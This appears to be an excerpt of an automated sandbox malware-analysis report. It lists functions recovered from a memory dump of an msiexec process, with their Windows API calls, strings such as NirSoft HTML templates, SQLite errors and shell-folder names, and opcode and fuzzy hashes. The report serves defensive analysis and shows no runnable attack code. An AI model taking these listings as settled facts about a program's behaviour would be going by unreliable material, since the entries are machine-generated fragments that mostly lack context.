                                                                            Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1700100422-0
                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                            Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                            • String ID:
                                                                            • API String ID: 552707033-0
                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                            Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf
                                                                            • String ID: %%0.%df
                                                                            • API String ID: 3473751417-763548558
                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                            Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                            • GetParent.USER32(?), ref: 00406136
                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                            • String ID: A
                                                                            • API String ID: 2892645895-3554254475
                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                            Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                            • memset.MSVCRT ref: 0040DA23
                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                            • String ID: caption
                                                                            • API String ID: 973020956-4135340389
                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                            Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                            • API String ID: 1283228442-2366825230
                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                            Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 00413972
                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                            • memset.MSVCRT ref: 004139B8
                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                            • memset.MSVCRT ref: 00413A00
                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                            • String ID: \systemroot
                                                                            • API String ID: 4173585201-1821301763
                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                            Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy
                                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                            • API String ID: 1284135714-318151290
                                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                            Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                            • strchr.MSVCRT ref: 0040C140
                                                                            • strchr.MSVCRT ref: 0040C151
                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                            • memset.MSVCRT ref: 0040C17A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                            • String ID: 4$h
                                                                            • API String ID: 4019544885-1856150674
                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                            Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                            • String ID: 0$6
                                                                            • API String ID: 4066108131-3849865405
                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                            Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004082EF
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                            • memset.MSVCRT ref: 00408362
                                                                            • memset.MSVCRT ref: 00408377
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 290601579-0
                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                            Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memchr.MSVCRT ref: 00444EBF
                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                            • memset.MSVCRT ref: 0044505E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memchrmemset
                                                                            • String ID: PD$PD
                                                                            • API String ID: 1581201632-2312785699
                                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                            Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                            • GetParent.USER32(?), ref: 00409FA5
                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                            • String ID:
                                                                            • API String ID: 2163313125-0
                                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                            Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$wcslen
                                                                            • String ID:
                                                                            • API String ID: 3592753638-3916222277
                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                            Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040A47B
                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                            • String ID: %s (%s)$YV@
                                                                            • API String ID: 3979103747-598926743
                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                            Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                            • String ID: Unknown Error$netmsg.dll
                                                                            • API String ID: 2767993716-572158859
                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                            Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                            • API String ID: 3176057301-2039793938
                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                            Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                            • database is already attached, xrefs: 0042F721
                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                            • out of memory, xrefs: 0042F865
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                            • API String ID: 1297977491-2001300268
                                                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                            Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
